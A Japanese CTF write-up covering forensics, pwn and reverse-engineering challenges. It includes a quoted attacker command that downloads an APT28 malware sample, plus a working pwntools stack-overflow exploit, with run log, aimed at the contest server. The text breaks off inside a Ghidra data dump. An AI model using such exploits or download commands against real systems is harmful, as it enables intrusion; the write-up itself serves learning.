この大会は2023/10/20 18:00(JST)~2023/10/22 18:00(JST)に開催されました。
今回もチームで参戦。結果は200点で272チーム中109位でした。
自分で解けた問題をWriteupとして書いておきます。
who-done-it (Misc)
ディスク上のファイルやシステム情報と一部のログ情報があるので、3つの質問に答える。
1問目は「侵害されたマシンのホスト名は何か」という問題。
SystemInfo\output.txtからホスト名がわかる。
DESKTOP-V2VNNIV
2問目は「侵害されたアカウントで攻撃者によってダウンロードされたマルウェアバイナリの名前は何か」という問題。
PhysicalDrive0_1\PowerShellHistory\Users\plant\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txtを見ると、以下の履歴が残っている。
Download -u https://github.com/mstfknn/malware-sample-library/raw/master/APT28%20FancyBear/ZekaAPT28.bin > download.txt
ZekaAPT28.bin
3問目は「攻撃者によってシステム上に作成された不審なスケジュールされたタスクは何か」という問題。
PhysicalDrive0_1\scheduled_task\Windows\System32\Tasksのファイル一覧から怪しいものを探す。
connect_to_server
baby-bof (Pwn)
Ghidraでデコンパイルする。
/* Ghidra decompilation of ./bof. The run log below shows no stack canary and no PIE
 * (image base 0x400000), which is what makes the fixed-address return-to-flag() work. */
undefined8 main(void)
{
  __gid_t __rgid;

  setvbuf(stdout,(char *)0x0,2,0);
  /* Sets real/saved gid to the effective gid — typical setgid CTF setup so that
   * flag.txt is presumably readable only through this binary. */
  __rgid = getegid();
  setresgid(__rgid,__rgid,__rgid);
  puts("Please enter the flag: ");
  vuln();
  return 0;
}

/* Stack buffer overflow (CWE-242): gets() has no length bound, so input longer than
 * the 304-byte buffer overwrites the saved RBP and then the return address.
 * The exploit below uses offset 312 = 304 (buffer) + 8 (saved RBP). */
void vuln(void)
{
  char local_138 [304];

  gets(local_138);
  return;
}

/* Never called by the program itself; reached only by hijacking vuln()'s return. */
void flag(void)
{
  char local_98 [136];
  FILE *local_10;

  local_10 = fopen("flag.txt","r");
  if (local_10 == (FILE *)0x0) {
    puts("Well done!! Now use exploit remote! ");
    /* WARNING: Subroutine does not return */
    exit(0);
  }
  fgets(local_98,0x80,local_10);
  /* Format-string bug (CWE-134): file contents are used as the printf format.
   * Not needed for this challenge (the flag contains no '%'), but worth noting. */
  printf(local_98);
  return;
}
gets()による単純なスタックBOFなので、リターンアドレスを書き換えてflag関数をコールすればよい。バッファは304バイトで、保存されたRBPの8バイトを含めるとオフセット312がリターンアドレスになる。flagのアドレスの前にretガジェットを1つ挟んでいるのは、flag内のfopen/printf呼び出し時にスタックが16バイト境界に揃うようにするため（揃っていないとmovaps等でクラッシュすることがある）。
$ ROPgadget --binary bof | grep ": ret" 0x00000000004005de : ret 0x00000000004007a2 : retf 0xfffe
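#!/usr/bin/env python3
"""Exploit for baby-bof: overflow the gets() buffer in vuln() and return into flag().

Offsets and addresses come from the Ghidra output above and the ROPgadget run:
  * local_138 is a 304-byte buffer; 304 + 8 (saved RBP) = 312 bytes to the return address
  * the binary is non-PIE (base 0x400000), so the `ret` gadget address is fixed
"""
import sys

from pwn import *

HOST = '35.234.99.122'
PORT = 31746
BINARY = './bof'
RET_OFFSET = 312        # 304-byte buffer + 8-byte saved RBP
RET_GADGET = 0x4005de   # ': ret' from ROPgadget (valid only because PIE is disabled)


def build_payload(flag_addr, ret_gadget=RET_GADGET, offset=RET_OFFSET):
    """Return the overflow payload: padding, a lone `ret`, then the address of flag().

    The extra `ret` keeps RSP 16-byte aligned on entry to flag(); without it the
    fopen()/printf() calls inside flag() can fault on an aligned SSE move.
    """
    return b'A' * offset + p64(ret_gadget) + p64(flag_addr)


def main():
    # No argument -> remote target; any argument -> local process for testing.
    if len(sys.argv) == 1:
        p = remote(HOST, PORT)
    else:
        p = process(BINARY)
    elf = ELF(BINARY)
    payload = build_payload(elf.symbols['flag'])

    print(p.recvline().decode().rstrip())   # "Please enter the flag: "
    print(payload)
    p.sendline(payload)
    print(p.recvrepeat(1).decode())
    p.close()


if __name__ == '__main__':
    main()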
実行結果は以下の通り。
[+] Opening connection to 35.234.99.122 on port 31746: Done [*] '/media/sf_Shared/bof' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: No PIE (0x400000) Stack: Executable RWX: Has RWX segments Please enter the flag: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xde\x05@\x00\x00\x00\x00\x00g\x07@\x00\x00\x00\x00\x00' ctf{c7fabc6bfe7e4b40b78244854f95f089414bb8354e021f89fe632202bb35ef99} [*] Closed connection to 35.234.99.122 port 31746
ctf{c7fabc6bfe7e4b40b78244854f95f089414bb8354e021f89fe632202bb35ef99}
AwesomeOne (Reverse Engineering)
Ghidraでデコンパイルする。
/* Ghidra decompilation of ./agoodone. */
int main(int argc,char **argv)
{
  _Bool _Var1;
  int iVar2;
  time_t tVar3;
  size_t sVar4;
  char **argv-local;
  int argc-local;
  _Bool auth;
  size_t len;

  /* time()-seeded rand() is only used to pick the failure message printed below;
   * it plays no part in the password check itself. */
  tVar3 = time((time_t *)0x0);
  srand((uint)tVar3);
  if (argc < 2) {
    printf("Usage: %s <key_value>\n",*argv);
    iVar2 = -1;
  }
  else {
    sVar4 = strlen(argv[1]);
    _Var1 = check_password(argv[1],(long)(int)sVar4);
    if (_Var1) {
      puts(&DAT_00102065);
      iVar2 = 0;
    }
    else {
      iVar2 = rand();
      printf("%s",fail_msgs[iVar2 % 0xe]);
      iVar2 = -1;
    }
  }
  return iVar2;
}

/* Returns true only if `result` stays 0, i.e. every input byte satisfies
 * strlen(enc_flag) ^ c ^ len == 0. Note that enc_flag is only measured (strlen),
 * never read: the binary does not decrypt it, so the flag has to be recovered
 * from the enc_flag blob offline (see the gdb dump and script below). */
_Bool check_password(char *passwd,size_t len)
{
  char cVar1;
  size_t sVar2;
  size_t len-local;
  char *passwd-local;
  int result;
  int i;

  result = 0;
  for (i = 0; (ulong)(long)i < len; i = i + 1) {
    cVar1 = passwd[i];
    sVar2 = strlen(enc_flag);
    result = result | (uint)sVar2 ^ (int)cVar1 ^ (uint)len;
    /* Looks like a leftover debug print: leaks the running OR after each character. */
    printf("%d",(ulong)(uint)result);
  }
  printf("%d\n",(ulong)(uint)result);
  return result == 0;
}
$ gdb -q ./agoodone Reading symbols from ./agoodone... gdb-peda$ b *check_password Breakpoint 1 at 0x12dc: file /home/oct/Desktop/agoodone.c, line 61. gdb-peda$ run abcdefgh Starting program: /media/sf_Shared/agoodone abcdefgh [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated. Use 'set logging enabled off'. Warning: 'set logging on', an alias for the command 'set logging enabled', is deprecated. Use 'set logging enabled on'. [----------------------------------registers-----------------------------------] RAX: 0x7fffffffe205 ("abcdefgh") RBX: 0x7fffffffde48 --> 0x7fffffffe1eb ("/media/sf_Shared/agoodone") RCX: 0x7ffff7f99860 --> 0x7ffff7f99210 --> 0x8ae1c4d2452ab58d RDX: 0x8 RSI: 0x8 RDI: 0x7fffffffe205 ("abcdefgh") RBP: 0x7fffffffdd30 --> 0x2 RSP: 0x7fffffffdd08 --> 0x55555555526b (<main+130>: mov BYTE PTR [rbp-0x9],al) RIP: 0x5555555552dc (<check_password>: endbr64) R8 : 0x7ffff7f99204 --> 0xcf7c67a18352ae7d R9 : 0xceaeef56 R10: 0x3373e954 R11: 0x7ffff7fe1cf0 (<_dl_audit_preinit>: mov eax,DWORD PTR [rip+0x1b162] # 0x7ffff7ffce58 <_rtld_global_ro+888>) R12: 0x0 R13: 0x7fffffffde60 --> 0x7fffffffe20e ("CLUTTER_IM_MODULE=xim") R14: 0x0 R15: 0x7ffff7ffd000 --> 0x7ffff7ffe2c0 --> 0x555555554000 --> 0x10102464c457f EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x5555555552d5 <main+236>: mov eax,0xffffffff 0x5555555552da <main+241>: leave 0x5555555552db <main+242>: ret => 0x5555555552dc <check_password>: endbr64 0x5555555552e0 <check_password+4>: push rbp 0x5555555552e1 <check_password+5>: mov rbp,rsp 0x5555555552e4 <check_password+8>: push rbx 0x5555555552e5 <check_password+9>: sub rsp,0x28 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffdd08 --> 
0x55555555526b (<main+130>: mov BYTE PTR [rbp-0x9],al) 0008| 0x7fffffffdd10 --> 0x7fffffffde48 --> 0x7fffffffe1eb ("/media/sf_Shared/agoodone") 0016| 0x7fffffffdd18 --> 0x200000000 0024| 0x7fffffffdd20 --> 0x0 0032| 0x7fffffffdd28 --> 0x8 0040| 0x7fffffffdd30 --> 0x2 0048| 0x7fffffffdd38 --> 0x7ffff7ded6ca (<__libc_start_call_main+122>: mov edi,eax) 0056| 0x7fffffffdd40 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 1, check_password (passwd=0x0, len=0x0) at /home/oct/Desktop/agoodone.c:61 61 /home/oct/Desktop/agoodone.c: そのようなファイルやディレクトリはありません. gdb-peda$ x/10gx enc_flag 0x555555556008: 0x247626233e031106 0x2323727270247471 0x555555556018: 0x237724737d727574 0x7d74212426232721 0x555555556028: 0x7d72242072712320 0x2172712473777121 0x555555556038: 0x76207c7124727c75 0x267c20722376757d 0x555555556048: 0x73550038737c2075 0x207325203a656761
check_passwordはenc_flagの長さ（strlen）しか参照しておらず、enc_flagの中身を復号する処理はバイナリ内にない。そこで正しい入力文字列を求めるのではなく、enc_flag自体が1バイトの鍵でXORされたフラグだと仮定する。フラグは"CTF{"から始まるので、enc_flagの先頭バイトと"C"をXORして鍵を割り出し（残りの"TF{"の3バイトでも同じ鍵になることを確認しておくとよい）、その鍵で全体を復号する。
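#!/usr/bin/env python3
"""Recover the AwesomeOne flag from the enc_flag blob dumped with gdb.

check_password() in the binary only calls strlen(enc_flag) and never reads its
contents, so the stored bytes are presumably the flag XORed with a single-byte key.
The flag format is known to start with "CTF{", which gives the key directly.
"""


def is_printable(s):
    """Return True when every byte of *s* is printable ASCII (0x20..0x7e)."""
    for c in s:
        if c < 32 or c > 126:
            return False
    return True


def derive_xor_key(enc, known_prefix=b'CTF{'):
    """Derive a single-byte XOR key from *enc* using a known plaintext prefix.

    Every prefix byte must yield the same key; otherwise the single-byte-XOR
    assumption is wrong and a ValueError is raised instead of returning garbage.
    """
    if not enc or not known_prefix:
        raise ValueError('need ciphertext and a known prefix')
    keys = {e ^ k for e, k in zip(enc, known_prefix)}
    if len(keys) != 1:
        raise ValueError(f'prefix does not fit a single-byte XOR key: {sorted(keys)}')
    return keys.pop()


def xor_decrypt(enc, key):
    """XOR every byte of *enc* with *key*; returns a str with one char per byte."""
    return ''.join(chr(c ^ key) for c in enc)


# qwords as printed by `x/10gx enc_flag`; the 10th word is truncated to the 5 flag
# bytes that precede the adjacent "Usage:" string.
enc_flag = [0x247626233e031106, 0x2323727270247471, 0x237724737d727574, 0x7d74212426232721,
            0x7d72242072712320, 0x2172712473777121, 0x76207c7124727c75, 0x267c20722376757d,
            0x38737c2075]
enc_flag = b''.join([c.to_bytes(8, 'little') for c in enc_flag]).rstrip(b'\x00')
key = derive_xor_key(enc_flag)
flag = xor_decrypt(enc_flag, key)
if not is_printable(flag.encode('latin-1')):
    raise SystemExit('decrypted data is not printable ASCII; the key guess is wrong')
print(flag)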
CTF{fc3a41a577ff10786a2fdbfcad18ef47ea78d426a47d097a49e3803f7e9c0e96}
combination (Reverse Engineering)
Ghidraでデコンパイルする。
int validator(long param_1) { long param_1-local; int var1; int var2341; var2341 = 0; while( true ) { if (0x1d < var2341) { return 1; } if ((int8_t (*) [4])(long)*(char *)(param_1 + var2341) != verify[var2341 * 9]) break; var2341 = var2341 + 1; } return -1; } verify XREF[2]: Entry Point(*), validator:001011f9(*) 00104020 30 78 34 int8_t[4 33 30 78 66 31 30 00104020 30 78 34 33 int8_t[4] "0x43" [0] XREF[2]: Entry Point(*), validator:001011f9(*) 00104020 [0] '0', 'x', '4', '3' 00104024 30 78 66 31 int8_t[4] "0xf1" [1] 00104028 30 78 32 35 int8_t[4] "0x25" [2] 0010402c 30 78 30 62 int8_t[4] "0x0b" [3] 00104030 30 78 61 63 int8_t[4] "0xac" [4] 00104034 30 78 61 32 int8_t[4] "0xa2" [5] 00104038 30 78 32 65 int8_t[4] "0x2e" [6] 0010403c 30 78 62 36 int8_t[4] "0xb6" [7] 00104040 30 78 62 32 int8_t[4] "0xb2" [8] 00104044 30 78 35 34 int8_t[4] "0x54" [9] 00104048 30 78 33 61 int8_t[4] "0x3a" [10] 0010404c 30 78 37 64 int8_t[4] "0x7d" [11] 00104050 30 78 34 66 int8_t[4] "0x4f" [12] 00104054 30 78 36 65 int8_t[4] "0x6e" [13] 00104058 30 78 31 64 int8_t[4] "0x1d" [14] 0010405c 30 78 32 65 int8_t[4] "0x2e" [15] 00104060 30 78 37 65 int8_t[4] "0x7e" [16] 00104064 30 78 64 31 int8_t[4] "0xd1" [17] 00104068 30 78 34 36 int8_t[4] "0x46" [18] 0010406c 30 78 38 61 int8_t[4] "0x8a" [19] 00104070 30 78 30 38 int8_t[4] "0x08" [20] 00104074 30 78 61 33 int8_t[4] "0xa3" [21] 00104078 30 78 36 30 int8_t[4] "0x60" [22] 0010407c 30 78 39 37 int8_t[4] "0x97" [23] 00104080 30 78 33 33 int8_t[4] "0x33" [24] 00104084 30 78 38 62 int8_t[4] "0x8b" [25] 00104088 30 78 31 61 int8_t[4] "0x1a" [26] 0010408c 30 78 37 62 int8_t[4] "0x7b" [27] 00104090 30 78 62 37 int8_t[4] "0xb7" [28] 00104094 30 78 38 63 int8_t[4] "0x8c" [29] 00104098 30 78 34 61 int8_t[4] "0x4a" [30] 0010409c 30 78 38 32 int8_t[4] "0x82" [31] 001040a0 30 78 32 66 int8_t[4] "0x2f" [32] 001040a4 30 78 39 62 int8_t[4] "0x9b" [33] 001040a8 30 78 62 31 int8_t[4] "0xb1" [34] 001040ac 30 78 34 34 int8_t[4] "0x44" [35] 001040b0 30 78 36 36 
int8_t[4] "0x66" [36] 001040b4 30 78 63 39 int8_t[4] "0xc9" [37] 001040b8 30 78 35 31 int8_t[4] "0x51" [38] 001040bc 30 78 64 33 int8_t[4] "0xd3" [39] 001040c0 30 78 39 63 int8_t[4] "0x9c" [40] 001040c4 30 78 34 62 int8_t[4] "0x4b" [41] 001040c8 30 78 36 39 int8_t[4] "0x69" [42] 001040cc 30 78 64 65 int8_t[4] "0xde" [43] 001040d0 30 78 30 63 int8_t[4] "0x0c" [44] 001040d4 30 78 36 35 int8_t[4] "0x65" [45] 001040d8 30 78 30 35 int8_t[4] "0x05" [46] 001040dc 30 78 36 61 int8_t[4] "0x6a" [47] 001040e0 30 78 34 66 int8_t[4] "0x4f" [48] 001040e4 30 78 33 37 int8_t[4] "0x37" [49] 001040e8 30 78 31 37 int8_t[4] "0x17" [50] 001040ec 30 78 30 30 int8_t[4] "0x00" [51] 001040f0 30 78 36 37 int8_t[4] "0x67" [52] 001040f4 30 78 32 33 int8_t[4] "0x23" [53] 001040f8 30 78 33 34 int8_t[4] "0x34" [54] 001040fc 30 78 31 31 int8_t[4] "0x11" [55] 00104100 30 78 66 30 int8_t[4] "0xf0" [56] 00104104 30 78 36 64 int8_t[4] "0x6d" [57] 00104108 30 78 36 35 int8_t[4] "0x65" [58] 0010410c 30 78 38 31 int8_t[4] "0x81" [59] 00104110 30 78 34 30 int8_t[4] "0x40" [60] 00104114 30 78 63 38 int8_t[4] "0xc8" [61] 00104118 30 78 63 39 int8_t[4] "0xc9" [62] 0010411c 30 78 33 30 int8_t[4] "0x30" [63] 00104120 30 78 61 37 int8_t[4] "0xa7" [64] 00104124 30 78 64 33 int8_t[4] "0xd3" [65] 00104128 30 78 34 65 int8_t[4] "0x4e" [66] 0010412c 30 78 63 35 int8_t[4] "0xc5" [67] 00104130 30 78 63 30 int8_t[4] "0xc0" [68] 00104134 30 78 30 64 int8_t[4] "0x0d" [69] 00104138 30 78 32 66 int8_t[4] "0x2f" [70] 0010413c 30 78 39 37 int8_t[4] "0x97" [71] 00104140 30 78 33 32 int8_t[4] "0x32" [72] 00104144 30 78 35 66 int8_t[4] "0x5f" [73] 00104148 30 78 31 62 int8_t[4] "0x1b" [74] 0010414c 30 78 62 65 int8_t[4] "0xbe" [75] 00104150 30 78 32 35 int8_t[4] "0x25" [76] 00104154 30 78 31 61 int8_t[4] "0x1a" [77] 00104158 30 78 32 36 int8_t[4] "0x26" [78] 0010415c 30 78 35 38 int8_t[4] "0x58" [79] 00104160 30 78 30 35 int8_t[4] "0x05" [80] 00104164 30 78 33 31 int8_t[4] "0x31" [81] 00104168 30 78 61 38 int8_t[4] "0xa8" [82] 
0010416c 30 78 32 39 int8_t[4] "0x29" [83] 00104170 30 78 30 39 int8_t[4] "0x09" [84] 00104174 30 78 39 65 int8_t[4] "0x9e" [85] 00104178 30 78 66 36 int8_t[4] "0xf6" [86] 0010417c 30 78 62 36 int8_t[4] "0xb6" [87] 00104180 30 78 62 63 int8_t[4] "0xbc" [88] 00104184 30 78 36 38 int8_t[4] "0x68" [89] 00104188 30 78 33 38 int8_t[4] "0x38" [90] 0010418c 30 78 66 35 int8_t[4] "0xf5" [91] 00104190 30 78 63 34 int8_t[4] "0xc4" [92] 00104194 30 78 33 36 int8_t[4] "0x36" [93] 00104198 30 78 38 31 int8_t[4] "0x81" [94] 0010419c 30 78 32 39 int8_t[4] "0x29" [95] 001041a0 30 78 64 63 int8_t[4] "0xdc" [96] 001041a4 30 78 36 35 int8_t[4] "0x65" [97] 001041a8 30 78 34 34 int8_t[4] "0x44" [98] 001041ac 30 78 33 33 int8_t[4] "0x33" [99] 001041b0 30 78 38 65 int8_t[4] "0x8e" [100] 001041b4 30 78 33 31 int8_t[4] "0x31" [101] 001041b8 30 78 38 39 int8_t[4] "0x89" [102] 001041bc 30 78 36 64 int8_t[4] "0x6d" [103] 001041c0 30 78 32 32 int8_t[4] "0x22" [104] 001041c4 30 78 64 61 int8_t[4] "0xda" [105] 001041c8 30 78 39 32 int8_t[4] "0x92" [106] 001041cc 30 78 38 37 int8_t[4] "0x87" [107] 001041d0 30 78 36 35 int8_t[4] "0x65" [108] 001041d4 30 78 35 37 int8_t[4] "0x57" [109] 001041d8 30 78 65 32 int8_t[4] "0xe2" [110] 001041dc 30 78 31 30 int8_t[4] "0x10" [111] 001041e0 30 78 35 38 int8_t[4] "0x58" [112] 001041e4 30 78 33 35 int8_t[4] "0x35" [113] 001041e8 30 78 32 65 int8_t[4] "0x2e" [114] 001041ec 30 78 36 35 int8_t[4] "0x65" [115] 001041f0 30 78 63 38 int8_t[4] "0xc8" [116] 001041f4 30 78 36 31 int8_t[4] "0x61" [117] 001041f8 30 78 63 35 int8_t[4] "0xc5" [118] 001041fc 30 78 31 30 int8_t[4] "0x10" [119] 00104200 30 78 32 30 int8_t[4] "0x20" [120] 00104204 30 78 36 66 int8_t[4] "0x6f" [121] 00104208 30 78 34 35 int8_t[4] "0x45" [122] 0010420c 30 78 38 30 int8_t[4] "0x80" [123] 00104210 30 78 32 61 int8_t[4] "0x2a" [124] 00104214 30 78 63 35 int8_t[4] "0xc5" [125] 00104218 30 78 33 33 int8_t[4] "0x33" [126] 0010421c 30 78 34 32 int8_t[4] "0x42" [127] 00104220 30 78 63 63 int8_t[4] 
"0xcc" [128] 00104224 30 78 64 38 int8_t[4] "0xd8" [129] 00104228 30 78 66 33 int8_t[4] "0xf3" [130] 0010422c 30 78 63 30 int8_t[4] "0xc0" [131] 00104230 30 78 35 39 int8_t[4] "0x59" [132] 00104234 30 78 66 62 int8_t[4] "0xfb" [133] 00104238 30 78 37 61 int8_t[4] "0x7a" [134] 0010423c 30 78 33 30 int8_t[4] "0x30" [135] 00104240 30 78 33 63 int8_t[4] "0x3c" [136] 00104244 30 78 65 64 int8_t[4] "0xed" [137] 00104248 30 78 65 66 int8_t[4] "0xef" [138] 0010424c 30 78 64 66 int8_t[4] "0xdf" [139] 00104250 30 78 30 32 int8_t[4] "0x02" [140] 00104254 30 78 62 32 int8_t[4] "0xb2" [141] 00104258 30 78 32 31 int8_t[4] "0x21" [142] 0010425c 30 78 31 61 int8_t[4] "0x1a" [143] 00104260 30 78 33 34 int8_t[4] "0x34" [144] 00104264 30 78 34 63 int8_t[4] "0x4c" [145] 00104268 30 78 66 62 int8_t[4] "0xfb" [146] 0010426c 30 78 35 32 int8_t[4] "0x52" [147] 00104270 30 78 30 32 int8_t[4] "0x02" [148] 00104274 30 78 32 66 int8_t[4] "0x2f" [149] 00104278 30 78 34 61 int8_t[4] "0x4a" [150] 0010427c 30 78 64 33 int8_t[4] "0xd3" [151] 00104280 30 78 38 61 int8_t[4] "0x8a" [152] 00104284 30 78 33 31 int8_t[4] "0x31" [153] 00104288 30 78 61 62 int8_t[4] "0xab" [154] 0010428c 30 78 66 33 int8_t[4] "0xf3" [155] 00104290 30 78 31 62 int8_t[4] "0x1b" [156] 00104294 30 78 30 61 int8_t[4] "0x0a" [157] 00104298 30 78 35 37 int8_t[4] "0x57" [158] 0010429c 30 78 63 63 int8_t[4] "0xcc" [159] 001042a0 30 78 37 65 int8_t[4] "0x7e" [160] 001042a4 30 78 65 63 int8_t[4] "0xec" [161] 001042a8 30 78 33 37 int8_t[4] "0x37" [162] 001042ac 30 78 35 63 int8_t[4] "0x5c" [163] 001042b0 30 78 61 32 int8_t[4] "0xa2" [164] 001042b4 30 78 65 39 int8_t[4] "0xe9" [165] 001042b8 30 78 36 62 int8_t[4] "0x6b" [166] 001042bc 30 78 62 62 int8_t[4] "0xbb" [167] 001042c0 30 78 34 37 int8_t[4] "0x47" [168] 001042c4 30 78 34 39 int8_t[4] "0x49" [169] 001042c8 30 78 35 35 int8_t[4] "0x55" [170] 001042cc 30 78 36 36 int8_t[4] "0x66" [171] 001042d0 30 78 65 66 int8_t[4] "0xef" [172] 001042d4 30 78 30 34 int8_t[4] "0x04" [173] 
001042d8 30 78 33 39 int8_t[4] "0x39" [174] 001042dc 30 78 64 65 int8_t[4] "0xde" [175] 001042e0 30 78 31 35 int8_t[4] "0x15" [176] 001042e4 30 78 63 33 int8_t[4] "0xc3" [177] 001042e8 30 78 66 30 int8_t[4] "0xf0" [178] 001042ec 30 78 39 37 int8_t[4] "0x97" [179] 001042f0 30 78 33 35 int8_t[4] "0x35" [180] 001042f4 30 78 66 64 int8_t[4] "0xfd" [181] 001042f8 30 78 34 37 int8_t[4] "0x47" [182] 001042fc 30 78 32 38 int8_t[4] "0x28" [183] 00104300 30 78 63 64 int8_t[4] "0xcd" [184] 00104304 30 78 33 33 int8_t[4] "0x33" [185] 00104308 30 78 33 38 int8_t[4] "0x38" [186] 0010430c 30 78 32 61 int8_t[4] "0x2a" [187] 00104310 30 78 38 65 int8_t[4] "0x8e" [188] 00104314 30 78 36 34 int8_t[4] "0x64" [189] 00104318 30 78 32 39 int8_t[4] "0x29" [190] 0010431c 30 78 61 33 int8_t[4] "0xa3" [191] 00104320 30 78 39 31 int8_t[4] "0x91" [192] 00104324 30 78 66 36 int8_t[4] "0xf6" [193] 00104328 30 78 39 65 int8_t[4] "0x9e" [194] 0010432c 30 78 64 36 int8_t[4] "0xd6" [195] 00104330 30 78 65 65 int8_t[4] "0xee" [196] 00104334 30 78 38 36 int8_t[4] "0x86" [197] 00104338 30 78 33 33 int8_t[4] "0x33" [198] 0010433c 30 78 62 34 int8_t[4] "0xb4" [199] 00104340 30 78 62 64 int8_t[4] "0xbd" [200] 00104344 30 78 35 62 int8_t[4] "0x5b" [201] 00104348 30 78 61 37 int8_t[4] "0xa7" [202] 0010434c 30 78 36 62 int8_t[4] "0x6b" [203] 00104350 30 78 66 64 int8_t[4] "0xfd" [204] 00104354 30 78 66 64 int8_t[4] "0xfd" [205] 00104358 30 78 30 32 int8_t[4] "0x02" [206] 0010435c 30 78 33 33 int8_t[4] "0x33" [207] 00104360 30 78 34 34 int8_t[4] "0x44" [208] 00104364 30 78 66 64 int8_t[4] "0xfd" [209] 00104368 30 78 31 66 int8_t[4] "0x1f" [210] 0010436c 30 78 35 64 int8_t[4] "0x5d" [211] 00104370 30 78 34 62 int8_t[4] "0x4b" [212] 00104374 30 78 65 32 int8_t[4] "0xe2" [213] 00104378 30 78 39 63 int8_t[4] "0x9c" [214] 0010437c 30 78 31 66 int8_t[4] "0x1f" [215] 00104380 30 78 33 33 int8_t[4] "0x33" [216] 00104384 30 78 32 65 int8_t[4] "0x2e" [217] 00104388 30 78 39 31 int8_t[4] "0x91" [218] 0010438c 30 78 66 
35 int8_t[4] "0xf5" [219] 00104390 30 78 38 33 int8_t[4] "0x83" [220] 00104394 30 78 65 36 int8_t[4] "0xe6" [221] 00104398 30 78 39 37 int8_t[4] "0x97" [222] 0010439c 30 78 61 64 int8_t[4] "0xad" [223] 001043a0 30 78 30 62 int8_t[4] "0x0b" [224] 001043a4 30 78 36 32 int8_t[4] "0x62" [225] 001043a8 30 78 31 39 int8_t[4] "0x19" [226] 001043ac 30 78 35 38 int8_t[4] "0x58" [227] 001043b0 30 78 62 34 int8_t[4] "0xb4" [228] 001043b4 30 78 36 35 int8_t[4] "0x65" [229] 001043b8 30 78 63 36 int8_t[4] "0xc6" [230] 001043bc 30 78 38 63 int8_t[4] "0x8c" [231] 001043c0 30 78 63 63 int8_t[4] "0xcc" [232] 001043c4 30 78 38 34 int8_t[4] "0x84" [233] 001043c8 30 78 33 34 int8_t[4] "0x34" [234] 001043cc 30 78 36 33 int8_t[4] "0x63" [235] 001043d0 30 78 63 64 int8_t[4] "0xcd" [236] 001043d4 30 78 63 63 int8_t[4] "0xcc" [237] 001043d8 30 78 64 33 int8_t[4] "0xd3" [238] 001043dc 30 78 64 66 int8_t[4] "0xdf" [239] 001043e0 30 78 65 63 int8_t[4] "0xec" [240] 001043e4 30 78 36 61 int8_t[4] "0x6a" [241] 001043e8 30 78 66 61 int8_t[4] "0xfa" [242] 001043ec 30 78 33 30 int8_t[4] "0x30" [243] 001043f0 30 78 35 33 int8_t[4] "0x53" [244] 001043f4 30 78 32 39 int8_t[4] "0x29" [245] 001043f8 30 78 34 65 int8_t[4] "0x4e" [246] 001043fc 30 78 39 37 int8_t[4] "0x97" [247] 00104400 30 78 31 64 int8_t[4] "0x1d" [248] 00104404 30 78 35 33 int8_t[4] "0x53" [249] 00104408 30 78 36 66 int8_t[4] "0x6f" [250] 0010440c 30 78 36 31 int8_t[4] "0x61" [251] 00104410 30 78 36 33 int8_t[4] "0x63" [252] 00104414 30 78 64 35 int8_t[4] "0xd5" [253] 00104418 30 78 36 61 int8_t[4] "0x6a" [254] 0010441c 30 78 31 61 int8_t[4] "0x1a" [255] 00104420 30 78 31 64 int8_t[4] "0x1d" [256] 00104424 30 78 64 66 int8_t[4] "0xdf" [257] 00104428 30 78 65 61 int8_t[4] "0xea" [258] 0010442c 30 78 35 38 int8_t[4] "0x58" [259] 00104430 30 78 63 66 int8_t[4] "0xcf" [260] 00104434 30 78 33 32 int8_t[4] "0x32" [261] 00104438 30 78 32 65 int8_t[4] "0x2e" [262] 0010443c 30 78 38 36 int8_t[4] "0x86" [263] 00104440 30 78 37 62 int8_t[4] "0x7b" 
[264] 00104444 30 78 39 39 int8_t[4] "0x99" [265] 00104448 30 78 32 62 int8_t[4] "0x2b" [266] 0010444c 30 78 39 34 int8_t[4] "0x94" [267] 00104450 30 78 37 38 int8_t[4] "0x78" [268] 00104454 30 78 66 34 int8_t[4] "0xf4" [269] 00104458 30 78 33 32 int8_t[4] "0x32" [270] 0010445c 30 78 63 65 int8_t[4] "0xce" [271] 00104460 30 78 31 35 int8_t[4] "0x15" [272] 00104464 30 78 33 36 int8_t[4] "0x36" [273] 00104468 30 78 39 36 int8_t[4] "0x96" [274] 0010446c 30 78 39 33 int8_t[4] "0x93" [275] 00104470 30 78 35 34 int8_t[4] "0x54" [276] 00104474 30 78 33 33 int8_t[4] "0x33" [277] 00104478 30 78 61 35 int8_t[4] "0xa5" [278] 0010447c 30 78 36 34 int8_t[4] "0x64" [279] 00104480 30 78 35 64 int8_t[4] "0x5d" [280] 00104484 30 78 65 32 int8_t[4] "0xe2" [281] 00104488 30 78 34 37 int8_t[4] "0x47" [282] 0010448c 30 78 38 64 int8_t[4] "0x8d" [283] 00104490 30 78 36 39 int8_t[4] "0x69" [284] 00104494 30 78 61 30 int8_t[4] "0xa0" [285] 00104498 30 78 66 38 int8_t[4] "0xf8" [286] 0010449c 30 78 65 39 int8_t[4] "0xe9" [287] 001044a0 30 78 33 39 int8_t[4] "0x39" [288] 001044a4 30 78 62 62 int8_t[4] "0xbb" [289] 001044a8 30 78 30 31 int8_t[4] "0x01" [290] 001044ac 30 78 64 62 int8_t[4] "0xdb" [291] 001044b0 30 78 31 65 int8_t[4] "0x1e" [292] 001044b4 30 78 64 37 int8_t[4] "0xd7" [293] 001044b8 30 78 38 61 int8_t[4] "0x8a" [294] 001044bc 30 78 35 63 int8_t[4] "0x5c" [295] 001044c0 30 78 62 61 int8_t[4] "0xba" [296] 001044c4 30 78 36 32 int8_t[4] "0x62" [297] 001044c8 30 78 61 66 